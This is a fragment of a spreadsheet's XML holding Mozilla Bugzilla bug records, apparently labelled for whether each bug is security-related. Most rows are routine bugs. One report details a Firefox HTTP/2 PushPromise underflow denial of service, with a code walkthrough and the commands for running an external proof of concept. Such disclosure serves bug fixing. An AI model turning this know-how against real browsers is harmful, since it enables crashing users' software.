Website:  http://www.turktrust.com.tr
General nature: Private Sector
Primary geographical area(s) served: Republic of Turkey
Number and type of subordinate CAs: 4 subroots used for in-house facilities
Audit Type (WebTrust, ETSI etc.): Audit and Formal Approval of Telecommunications Authority of Turkey 
Auditor: Turkish Telecommunications Authority
Auditor Website: www.tk.gov.tr
Audit Document URL(s): Attached (has already used for Microsoft Application)
Certificate Details 
------------------- 
1. Certificate 1
Certificate Name: TURKTRUST_Root_1
Summary Paragraph, including the following: N/A
Certificate HTTP URL (on CA website):
http://www.turktrust.com.tr/sertifikalar/kok_s2.crt 
Version: V3 
SHA1 Fingerprint: 79 98 a3 08 e1 4d 65 85 e6 c2 1e 15 3a 71 9f ba 5a d3 4a d9
MD5 Fingerprint: N/A 
Modulus Length (a.k.a. "key length"): 2048 bits 
Valid From (YYYY-MM-DD): 2005-05-13 
Valid To (YYYY-MM-DD): 2015-03-22 
OCSP URL: http://ocsp.turktrust.com.tr
Class (domain-validated, identity-validated or EV): Both Domain-Validated and
Identity-Validated 
Certificate Policy URL: http://www.turktrust.com.tr/pdf/TURKTRUST_SI_S-01.pdf 
CPS URL:  http://www.turktrust.com.tr/pdf/TURKTRUST_SUE_S-01.pdf 
Requested Trust Indicators (email and/or SSL and/or code): Code signing,
Timestamping, Server authentication, Client authentication, Secure Email, OCSP 
------------------- 
2. Certificate 2
Certificate Name: TURKTRUST_Root_2
Summary Paragraph, including the following: N/A
Certificate HTTP URL (on CA website):
http://www.turktrust.com.tr/sertifikalar/TURKTRUST_Elektronik_Sertifika _Hizmet_Saglayicisi.crt    
Version: V3 
SHA1 Fingerprint: b4 35 d4 e1 11 9d 1c 66 90 a7 49 eb b3 94 bd 63 7b a7 82 b7
MD5 Fingerprint: N/A 
Modulus Length (a.k.a. "key length"): 2048 bits 
Valid From (YYYY-MM-DD): 2005-07-11 
Valid To (YYYY-MM-DD): 2015-09-16
OCSP URL: http://ocsp.turktrust.com.tr
Class (domain-validated, identity-validated or EV): Both Domain-Validated and
Identity-Validated
Certificate Policy URL: http://www.turktrust.com.tr/pdf/TURKTRUST_SI_S-01.pdf 
CPS URL:  http://www.turktrust.com.tr/pdf/TURKTRUST_SUE_S-01.pdf 
Requested Trust Indicators (email and/or SSL and/or code): Code signing,
Timestamping, Server authentication, Client authentication, Secure Email, OCSP 
Reproducible: Always
Steps to Reproduce:
1.
2.
3.</t>
        </is>
      </c>
      <c r="X4379" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4380">
      <c r="A4380" t="n">
        <v>163331</v>
      </c>
      <c r="B4380" t="inlineStr">
        <is>
          <t>2002-08-18 07:41:36 -0700</t>
        </is>
      </c>
      <c r="C4380" t="inlineStr">
        <is>
          <t>shutdownhtml is broken</t>
        </is>
      </c>
      <c r="D4380" t="inlineStr">
        <is>
          <t>2012-12-18 20:46:32 -0800</t>
        </is>
      </c>
      <c r="E4380" t="n">
        <v>1</v>
      </c>
      <c r="F4380" t="n">
        <v>1</v>
      </c>
      <c r="G4380" t="n">
        <v>4</v>
      </c>
      <c r="H4380" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I4380" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J4380" t="inlineStr">
        <is>
          <t>Bugzilla-General</t>
        </is>
      </c>
      <c r="K4380" t="inlineStr">
        <is>
          <t>2.17</t>
        </is>
      </c>
      <c r="L4380" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M4380" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N4380" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4380" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4380" t="inlineStr"/>
      <c r="Q4380" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4380" t="inlineStr">
        <is>
          <t>blocker</t>
        </is>
      </c>
      <c r="S4380" t="inlineStr">
        <is>
          <t>Bugzilla 2.18</t>
        </is>
      </c>
      <c r="T4380" t="n">
        <v>1</v>
      </c>
      <c r="U4380" t="n">
        <v>0</v>
      </c>
      <c r="V4380" t="n">
        <v>4</v>
      </c>
      <c r="W4380" t="inlineStr">
        <is>
          <t>The shutdownhtml code in CGI.pl processes message.html.tmpl directly, so it
wasn't caught in the greps for the message i18n'ing.
Currently setting shutdownhtml fails with the error:
"You are using Bugzilla's error-reporting functions incorrectly. You passed in
the string 'shutdown!'. The correct use is to pass in a tag, and define that tag
in the file messages.html.tmpl.
If you are a Bugzilla end-user seeing this message, please save this page and
send it to bbaetz@localhost."</t>
        </is>
      </c>
      <c r="X4380" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4381">
      <c r="A4381" t="n">
        <v>1194820</v>
      </c>
      <c r="B4381" t="inlineStr">
        <is>
          <t>2015-08-14 11:40:05 -0700</t>
        </is>
      </c>
      <c r="C4381" t="inlineStr">
        <is>
          <t>Firefox HTTP2 Malformed PushPromise Underflow DoS</t>
        </is>
      </c>
      <c r="D4381" t="inlineStr">
        <is>
          <t>2016-07-02 11:09:11 -0700</t>
        </is>
      </c>
      <c r="E4381" t="n">
        <v>1</v>
      </c>
      <c r="F4381" t="n">
        <v>1</v>
      </c>
      <c r="G4381" t="n">
        <v>3</v>
      </c>
      <c r="H4381" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4381" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4381" t="inlineStr">
        <is>
          <t>Networking: HTTP</t>
        </is>
      </c>
      <c r="K4381" t="inlineStr">
        <is>
          <t>39 Branch</t>
        </is>
      </c>
      <c r="L4381" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M4381" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N4381" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4381" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4381" t="inlineStr">
        <is>
          <t>[post-critsmash-triage][adv-main43+]</t>
        </is>
      </c>
      <c r="Q4381" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4381" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4381" t="inlineStr">
        <is>
          <t>mozilla43</t>
        </is>
      </c>
      <c r="T4381" t="n">
        <v>1</v>
      </c>
      <c r="U4381" t="n">
        <v>0</v>
      </c>
      <c r="V4381" t="n">
        <v>7</v>
      </c>
      <c r="W4381" t="inlineStr">
        <is>
          <t>User Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
Steps to reproduce:
# Firefox HTTP2 Malformed PushPromise Underflow DoS
## Overview
A malformed HTTP2 PushPromse frame is sent to the browser. The length of the decompressed buffer is miscalculated an underflow occurs. This causes an nsCString to try to allocate nearly 2^32 bytes of memory. This is greater than firefox allows and an assert is tripped.
## Walkthrough
On line 1634 of Http2Session.cpp, a call is made to append the decompressed frame onto a decompressed buffer. 
self-&gt;mDecompressBuffer.Append(self-&gt;mInputFrameBuffer + kFrameHeaderBytes + paddingControlBytes + promiseLen,
         self-&gt;mInputFrameDataSize - paddingControlBytes - promiseLen - paddingLength);
The values and types for the PoC are:
self-&gt;mDecompressBuffer.Append(nsAutoArrayPtr&lt;char&gt;(ptr) + uint_8(9) + uint8_t(1) + uint32_t(4), uint32_t(76) - uint8_t(1) - uint32_t(4) - uint16_t(75));
The second argument is casted to a size_type (uint32), and the underflow occurs. The resulting value is 4294967292.
A bunch of string checks are then performed to make sure the append is sane. Eventually in nsTSubstring.cpp:45 MutatePrep is called with:
MutatePrep(this=0x00000xxxx, aCapacity=4294967292, aOldData=0x00000xxxxx, aOldFlags=0x00000xxxxxxx).
In the function, kMaxCapacity for a string is determined to be:
const size_type kMaxCapacity = (size_type(-1) / 2 - sizeof(nsStringBuffer)) / sizeof(char_type) - 2;
// kMaxCapacity = 2147483637
kMaxCapacity is then compared to our capacity (4294967292). Since the capacity exceds the max allowed, an error is thrown on line 531 of nsTSubstring.cpp.
AllocFailed(Length() - aCutLength + 1)
## Tested on 
Firefox 39.0. MacOS
42.0a1 (2015-07-21) MacOS
## PoC
Code can be found here:
https://notr-bucket.s3.amazonaws.com/977e424b-1c23-413b-b3f4-75d95cddd770
To use:
Extract the file and the certs
$ go run firefoxHeaderPoc.go
$ ./firefox https://localhost:8000
## Author
Stuart Larsen
Yahoo! Pentest Team</t>
        </is>
      </c>
      <c r="X4381" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4382">
      <c r="A4382" t="n">
        <v>542136</v>
      </c>
      <c r="B4382" t="inlineStr">
        <is>
          <t>2010-01-25 17:32:53 -0800</t>
        </is>
      </c>
      <c r="C4382" t="inlineStr">
        <is>
          <t>"ASSERTION: Incorrect aState.mPrevChild before inserting line at end"</t>
        </is>
      </c>
      <c r="D4382" t="inlineStr">
        <is>
          <t>2010-07-25 16:43:32 -0700</t>
        </is>
      </c>
      <c r="E4382" t="n">
        <v>1</v>
      </c>
      <c r="F4382" t="n">
        <v>1</v>
      </c>
      <c r="G4382" t="n">
        <v>3</v>
      </c>
      <c r="H4382" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4382" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4382" t="inlineStr">
        <is>
          <t>Layout</t>
        </is>
      </c>
      <c r="K4382" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L4382" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M4382" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N4382" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4382" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4382" t="inlineStr">
        <is>
          <t>[sg:critical?]</t>
        </is>
      </c>
      <c r="Q4382" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4382" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4382" t="inlineStr">
        <is>
          <t>mozilla1.9.3a1</t>
        </is>
      </c>
      <c r="T4382" t="n">
        <v>1</v>
      </c>
      <c r="U4382" t="n">
        <v>0</v>
      </c>
      <c r="V4382" t="n">
        <v>15</v>
      </c>
      <c r="W4382" t="inlineStr">
        <is>
          <t>Created attachment 423454
testcase
###!!! ASSERTION: Incorrect aState.mPrevChild before inserting line at end: 'aState.mPrevChild == mFrames.LastChild()', file /Users/jruderman/mozilla-central/layout/generic/nsBlockFrame.cpp, line 2162
bz marked a previous bug with this assertion as security-sensitive (bug 522170), so I'm filing this one as security-sensitive.</t>
        </is>
      </c>
      <c r="X4382" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4383">
      <c r="A4383" t="n">
        <v>1433492</v>
      </c>
      <c r="B4383" t="inlineStr">
        <is>
          <t>2018-01-26 08:21:10 -0800</t>
        </is>
      </c>
      <c r="C4383" t="inlineStr">
        <is>
          <t>RSS feeds don't remember their read/unread status after a restart</t>
        </is>
      </c>
      <c r="D4383" t="inlineStr">
        <is>
          <t>2018-07-11 07:14:24 -0700</t>
        </is>
      </c>
      <c r="E4383" t="n">
        <v>1</v>
      </c>
      <c r="F4383" t="n">
        <v>1</v>
      </c>
      <c r="G4383" t="n">
        <v>2</v>
      </c>
      <c r="H4383" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I4383" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J4383" t="inlineStr">
        <is>
          <t>Bookmarks &amp; History</t>
        </is>
      </c>
      <c r="K4383" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4383" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M4383" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N4383" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4383" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4383" t="inlineStr">
        <is>
          <t>[fxsearch]</t>
        </is>
      </c>
      <c r="Q4383" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4383" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4383" t="inlineStr">
        <is>
          <t>Firefox 60</t>
        </is>
      </c>
      <c r="T4383" t="n">
        <v>1</v>
      </c>
      <c r="U4383" t="n">
        <v>0</v>
      </c>
      <c r="V4383" t="n">
        <v>13</v>
      </c>
      <c r="W4383" t="inlineStr">
        <is>
          <t>The changes in Bug 1370881 caused a minor regression whereby viewing an RSS feed (e.g. on the toolbar) after startup would not have indications of previously read articles.
STR:
1) Add a feed to the bookmarks toolbar.
2) Open the feed, read an article or two.
3) Restart Firefox.
4) Open the feed again
Actual Result
=&gt; Feed items are not marked as read
Expected Result
=&gt; The feed items that were read are now marked as read again.</t>
        </is>
      </c>
      <c r="X4383" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4384">
      <c r="A4384" t="n">
        <v>643927</v>
      </c>
      <c r="B4384" t="inlineStr">
        <is>
          <t>2011-03-22 14:52:15 -0700</t>
        </is>
      </c>
      <c r="C4384" t="inlineStr">
        <is>
          <t>GC hazard in JS_XDRScriptObject</t>
        </is>
      </c>
      <c r="D4384" t="inlineStr">
        <is>
          <t>2011-07-12 08:22:22 -0700</t>
        </is>
      </c>
      <c r="E4384" t="n">
        <v>1</v>
      </c>
      <c r="F4384" t="n">
        <v>1</v>
      </c>
      <c r="G4384" t="n">
        <v>3</v>
      </c>
      <c r="H4384" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4384" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4384" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K4384" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4384" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4384" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4384" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4384" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4384" t="inlineStr">
        <is>
          <t>[sg:critical?]</t>
        </is>
      </c>
      <c r="Q4384" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4384" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4384" t="inlineStr">
        <is>
          <t>mozilla5</t>
        </is>
      </c>
      <c r="T4384" t="n">
        <v>1</v>
      </c>
      <c r="U4384" t="n">
        <v>0</v>
      </c>
      <c r="V4384" t="n">
        <v>13</v>
      </c>
      <c r="W4384" t="inlineStr">
        <is>
          <t>When reviewing the patch for the bug 632253 I have missed that JSScript::filename is only rooted by JSScript. So the result of js_SaveScriptFilename must be stored in the rooted script instance before a GC can happen. Yet I have suggested to decode the filename before any script instance id created.</t>
        </is>
      </c>
      <c r="X4384" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4385">
      <c r="A4385" t="n">
        <v>511698</v>
      </c>
      <c r="B4385" t="inlineStr">
        <is>
          <t>2009-08-20 11:23:25 -0700</t>
        </is>
      </c>
      <c r="C4385" t="inlineStr">
        <is>
          <t>Create switch page for Sfx</t>
        </is>
      </c>
      <c r="D4385" t="inlineStr">
        <is>
          <t>2011-08-25 09:49:06 -0700</t>
        </is>
      </c>
      <c r="E4385" t="n">
        <v>1</v>
      </c>
      <c r="F4385" t="n">
        <v>1</v>
      </c>
      <c r="G4385" t="n">
        <v>6</v>
      </c>
      <c r="H4385" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I4385" t="inlineStr">
        <is>
          <t>Websites Graveyard</t>
        </is>
      </c>
      <c r="J4385" t="inlineStr">
        <is>
          <t>spreadfirefox.com</t>
        </is>
      </c>
      <c r="K4385" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4385" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4385" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4385" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4385" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4385" t="inlineStr"/>
      <c r="Q4385" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4385" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4385" t="inlineStr">
        <is>
          <t>3.0.5</t>
        </is>
      </c>
      <c r="T4385" t="n">
        <v>1</v>
      </c>
      <c r="U4385" t="n">
        <v>0</v>
      </c>
      <c r="V4385" t="n">
        <v>14</v>
      </c>
      <c r="W4385" t="inlineStr">
        <is>
          <t>Create a new page for the switch campaign on spreadfirefox at www.spreadfirefox.com/switch</t>
        </is>
      </c>
      <c r="X4385" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4386">
      <c r="A4386" t="n">
        <v>1324716</v>
      </c>
      <c r="B4386" t="inlineStr">
        <is>
          <t>2016-12-20 00:34:58 -0800</t>
        </is>
      </c>
      <c r="C4386" t="inlineStr">
        <is>
          <t>Investigate handling of characters disallowed in URLs by IDNA2008</t>
        </is>
      </c>
      <c r="D4386" t="inlineStr">
        <is>
          <t>2017-08-28 13:37:26 -0700</t>
        </is>
      </c>
      <c r="E4386" t="n">
        <v>1</v>
      </c>
      <c r="F4386" t="n">
        <v>1</v>
      </c>
      <c r="G4386" t="n">
        <v>3</v>
      </c>
      <c r="H4386" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4386" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4386" t="inlineStr">
        <is>
          <t>Networking</t>
        </is>
      </c>
      <c r="K4386" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L4386" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M4386" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N4386" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4386" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4386" t="inlineStr">
        <is>
          <t>[necko-active][post-critsmash-triage][adv-main51+][adv-esr45.7+]</t>
        </is>
      </c>
      <c r="Q4386" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4386" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4386" t="inlineStr">
        <is>
          <t>mozilla53</t>
        </is>
      </c>
      <c r="T4386" t="n">
        <v>1</v>
      </c>
      <c r="U4386" t="n">
        <v>0</v>
      </c>
      <c r="V4386" t="n">
        <v>24</v>
      </c>
      <c r="W4386" t="inlineStr">
        <is>
          <t>Bug 1323338 added U+2010 HYPHEN to the IDN blacklist. See what I said there in bug 1323338 comment 20:
&gt; &gt; Have we implemented IDNA2008, or just some tweaks on top of IDN2003?
&gt; &gt; according to rfc5892 \u2010 is "DISALLOWED" along with the rest of that
&gt; &gt; punctuation block (except ZWNJ and ZWJ which are CONTEXTJ).
&gt; 
&gt; In http://www.unicode.org/Public/idna/latest/IdnaMappingTable.txt U+2010 is
&gt; marked as "valid" with the annotation "NV8". According to
&gt; http://www.unicode.org/reports/tr46/#Table_Data_File_Fields this means "the
&gt; status is valid but the character is excluded by IDNA2008 from all domain
&gt; names for all versions of Unicode".
&gt; 
&gt; I think further investigation is needed to be sure how ICU's implementation
&gt; of IDNA2008 treats such characters, i.e. whether they just accept them as
&gt; valid, or whether they are setting some flag which we aren't testing for.
&gt; This covers other characters as well, as long as they don't trigger punicode
&gt; by being marked as "restricted" in xidmodifications.txt/, for example U+058A
&gt; ARMENIAN HYPHEN</t>
        </is>
      </c>
      <c r="X4386" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4387">
      <c r="A4387" t="n">
        <v>857710</v>
      </c>
      <c r="B4387" t="inlineStr">
        <is>
          <t>2013-04-03 11:56:44 -0700</t>
        </is>
      </c>
      <c r="C4387" t="inlineStr">
        <is>
          <t>Add Yandex as Additional Search Provider</t>
        </is>
      </c>
      <c r="D4387" t="inlineStr">
        <is>
          <t>2020-12-21 10:38:46 -0800</t>
        </is>
      </c>
      <c r="E4387" t="n">
        <v>1</v>
      </c>
      <c r="F4387" t="n">
        <v>1</v>
      </c>
      <c r="G4387" t="n">
        <v>6</v>
      </c>
      <c r="H4387" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I4387" t="inlineStr">
        <is>
          <t>Firefox for Android Graveyard</t>
        </is>
      </c>
      <c r="J4387" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K4387" t="inlineStr">
        <is>
          <t>23 Branch</t>
        </is>
      </c>
      <c r="L4387" t="inlineStr">
        <is>
          <t>ARM</t>
        </is>
      </c>
      <c r="M4387" t="inlineStr">
        <is>
          <t>Android</t>
        </is>
      </c>
      <c r="N4387" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4387" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4387" t="inlineStr"/>
      <c r="Q4387" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4387" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4387" t="inlineStr">
        <is>
          <t>Firefox 23</t>
        </is>
      </c>
      <c r="T4387" t="n">
        <v>1</v>
      </c>
      <c r="U4387" t="n">
        <v>0</v>
      </c>
      <c r="V4387" t="n">
        <v>3</v>
      </c>
      <c r="W4387" t="inlineStr">
        <is>
          <t>We need this for revenue credit</t>
        </is>
      </c>
      <c r="X4387" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4388">
      <c r="A4388" t="n">
        <v>895237</v>
      </c>
      <c r="B4388" t="inlineStr">
        <is>
          <t>2013-07-17 20:14:18 -0700</t>
        </is>
      </c>
      <c r="C4388" t="inlineStr">
        <is>
          <t>[STK] dummy function problem in icc.js</t>
        </is>
      </c>
      <c r="D4388" t="inlineStr">
        <is>
          <t>2013-07-25 11:08:57 -0700</t>
        </is>
      </c>
      <c r="E4388" t="n">
        <v>1</v>
      </c>
      <c r="F4388" t="n">
        <v>1</v>
      </c>
      <c r="G4388" t="n">
        <v>6</v>
      </c>
      <c r="H4388" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I4388" t="inlineStr">
        <is>
          <t>Firefox OS Graveyard</t>
        </is>
      </c>
      <c r="J4388" t="inlineStr">
        <is>
          <t>Gaia::System</t>
        </is>
      </c>
      <c r="K4388" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4388" t="inlineStr">
        <is>
          <t>ARM</t>
        </is>
      </c>
      <c r="M4388" t="inlineStr">
        <is>
          <t>Gonk (Firefox OS)</t>
        </is>
      </c>
      <c r="N4388" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4388" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4388" t="inlineStr">
        <is>
          <t>[TD-64763] [LeoVB+]</t>
        </is>
      </c>
      <c r="Q4388" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4388" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S4388" t="inlineStr">
        <is>
          <t>1.1 QE4 (15jul)</t>
        </is>
      </c>
      <c r="T4388" t="n">
        <v>1</v>
      </c>
      <c r="U4388" t="n">
        <v>0</v>
      </c>
      <c r="V4388" t="n">
        <v>5</v>
      </c>
      <c r="W4388" t="inlineStr">
        <is>
          <t>Created attachment 777549
log file1
VIVO operator is testing for STK by using special sim card. It is called "HRS test".
But there is critical problem. 
this sim card send toolkit cmd(SET_UP_MENU -&gt; PROVIDE_LOCAL_INFO) after booting. 
As you know, when UE receive unsol proactive cmd, icc_worker will handle about that. 
So, PROVIDE_LOCAL_INFO will be processed in icc_work.js. 
When we have finished analyzing this issue, We think that dummy function is not operated properly. 
plz see this problem and let me know why this log printed "iccmanager is not defined" 
&lt;radio.log&gt;
07-17 16:35:01.699 E/GeckoConsole(  152): [JavaScript Error: "iccManager is not defined" {file: "app://system.gaiamobile.org/js/icc_worker.js" line: 9}]
07-17 16:35:01.699 E/GeckoConsole(  152): [JavaScript Error: "NS_ERROR_XPC_JAVASCRIPT_ERROR_WITH_DETAILS: '[JavaScript Error: "iccManager is not defined" {file: "app://system.gaiamobile.org/js/icc_worker.js" line: 9}]' when calling method: [nsIDOMSystemMessageCallback::handleMessage]" {file: "jar:file:///system/b2g/omni.ja!/components/SystemMessageManager.js" line: 97}]
&lt;icc_worker.js&gt;
dummy: function icc_worker_dummy() {
    DUMP('STK Command not implemented yet');
    iccManager.responseSTKCommand({
      resultCode: iccManager._icc.STK_RESULT_OK
    });
  },
........
'0x26': function STK_CMD_PROVIDE_LOCAL_INFO(command, iccManager) {
    // https://bugzilla.mozilla.org/show_bug.cgi?id=817952
    DUMP('STK_CMD_PROVIDE_LOCAL_INFO', command.options);
    icc_worker.dummy();
  },
DESCRIPTION:
Insert a new VIVO Sim Card (HLR:18) and turn on the UE.
Wait until UE show HRS Activation Menu.
EXPECTED:
UE should show HRS pop-up.
ACTUAL:
UE rings the notification but no pop-up is showed. UE shows SMS Menu. If user returns to Idle Screen and open SMS Menu, the pop-up is showed.</t>
        </is>
      </c>
      <c r="X4388" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4389">
      <c r="A4389" t="n">
        <v>667315</v>
      </c>
      <c r="B4389" t="inlineStr">
        <is>
          <t>2011-06-26 11:47:17 -0700</t>
        </is>
      </c>
      <c r="C4389" t="inlineStr">
        <is>
          <t>XSLT crashes Firefox 5 and Firefox 7 (but not Firefox 4)</t>
        </is>
      </c>
      <c r="D4389" t="inlineStr">
        <is>
          <t>2015-10-16 11:48:33 -0700</t>
        </is>
      </c>
      <c r="E4389" t="n">
        <v>1</v>
      </c>
      <c r="F4389" t="n">
        <v>1</v>
      </c>
      <c r="G4389" t="n">
        <v>3</v>
      </c>
      <c r="H4389" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4389" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4389" t="inlineStr">
        <is>
          <t>XSLT</t>
        </is>
      </c>
      <c r="K4389" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L4389" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4389" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4389" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4389" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4389" t="inlineStr">
        <is>
          <t>[sg:critical?][qa-]</t>
        </is>
      </c>
      <c r="Q4389" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4389" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S4389" t="inlineStr">
        <is>
          <t>mozilla7</t>
        </is>
      </c>
      <c r="T4389" t="n">
        <v>1</v>
      </c>
      <c r="U4389" t="n">
        <v>0</v>
      </c>
      <c r="V4389" t="n">
        <v>28</v>
      </c>
      <c r="W4389" t="inlineStr">
        <is>
          <t>User-Agent:       Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0
Build Identifier: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0
Some (but not all) XSLT crashes Firefox 5 on Windows 7 and XP.  This crash did not happen on Firefox 4 or earlier.
The crash happens on local XSLT files as well.
Reproducible: Always
Steps to Reproduce:
1. Load the page indicated in the url
Actual Results:  
Loading the XSLT at the cited URL crashes Firefox 5 but not 4 and earlier.
Expected Results:  
Firefox 5 should not crash, because Firefox 4 did not crash (and neither do IE or Chrome).
I haven't tried methodically whittling down the XSLT to find out whether it is a particular function or extension which is causing the crash.  If that is something that would be useful, I can do it; otherwise, I am hoping other people report similar problems.</t>
        </is>
      </c>
      <c r="X4389" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4390">
      <c r="A4390" t="n">
        <v>729939</v>
      </c>
      <c r="B4390" t="inlineStr">
        <is>
          <t>2012-02-23 07:28:52 -0800</t>
        </is>
      </c>
      <c r="C4390" t="inlineStr">
        <is>
          <t>mozilla.org: /apps/ email subscription form is 500ing</t>
        </is>
      </c>
      <c r="D4390" t="inlineStr">
        <is>
          <t>2019-03-06 09:54:02 -0800</t>
        </is>
      </c>
      <c r="E4390" t="n">
        <v>1</v>
      </c>
      <c r="F4390" t="n">
        <v>1</v>
      </c>
      <c r="G4390" t="n">
        <v>6</v>
      </c>
      <c r="H4390" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I4390" t="inlineStr">
        <is>
